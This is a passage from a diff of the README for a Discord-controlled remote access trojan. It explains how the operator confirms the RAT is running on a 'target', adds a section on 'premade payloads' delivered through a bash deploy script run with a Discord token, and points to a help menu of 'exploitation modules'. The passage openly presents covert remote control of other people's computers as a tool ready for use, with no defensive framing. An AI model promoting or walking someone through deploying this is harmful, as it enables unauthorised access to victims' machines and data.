simen64/Discord-RAT-v2/README.md

 Now if you have access to your targets terminal output of `RAT-V2.py` you should see this when the program has started: `Logged in as: Your bot`

+### Other ways to deploy

+The previous steps are the original way too deploy which you can use to package in your payload.
+But i have also made a premade payloads to deliver it with just a file / command.
+I will make more in the future.

+[Bash command](Deploy-script-bash.sh) Run this with your discord token as the command argument, like this: `bash Deploy-script-bash.sh discord-token`

 ## Usage

 In the discord server you invited your bot to you can access the help menu which lists all exploitation modules with `!help`